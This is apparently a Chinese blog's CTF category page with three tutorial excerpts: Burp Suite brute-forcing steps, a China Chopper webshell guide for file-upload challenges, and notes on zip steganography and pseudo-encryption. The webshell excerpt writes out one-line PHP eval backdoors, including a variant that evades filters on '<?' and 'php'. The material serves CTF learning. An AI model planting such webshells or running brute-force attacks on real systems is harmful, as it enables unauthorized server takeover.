ctf
关注
分享
扫一扫
小Sakura怪兽
命运随时给你踹一脚,我们到时候得躲开
展开
-
Burp Suite 爆破步骤
burp爆破步骤,再不写我又得忘记了先开启 intercept is on,监听动作抓包如下:然后右键 send to intruder点击intruder --> Positions ,先Clear $ ,然后对需要爆破的数据进行Add $点击Payloads,添加好爆破的数据,点击add如果是文件字典的话,选择load点击打开点击in...原创 2019-12-13 21:49:42 · 3366 阅读 · 0 评论 -
中国菜刀使用教程--ctf 文件上传
首先把包含一句话的文件上传,php内容文件如下:<?php eval($_POST['a']);?>如果会过滤 <? 和 php 关键字,可以使用长标签<script language="pHp">@eval($_POST['sb'])</script>打开中国菜刀主页面,右键点击添加,配置如下(密码即上面的sb)点击...原创 2019-11-07 16:45:53 · 5890 阅读 · 0 评论 -
压缩包隐写
压缩包本身不具备隐藏信息的功能,但CTF中压缩包经常与隐写术结合一起来考查。压缩包格式:Rar 有Rar标志 zip 有PK标志 7z 有7z标志zip 的 无加密 伪加密 真加密有两个加密标志 数据区和目录区的加密标记无加密 (偶数(00 00)偶数) 伪加密(偶数奇数) 真加密(奇数奇数(09 00))压缩包+图片压缩包和图片混合,但给出的是压缩...原创 2019-11-01 17:06:35 · 2779 阅读 · 0 评论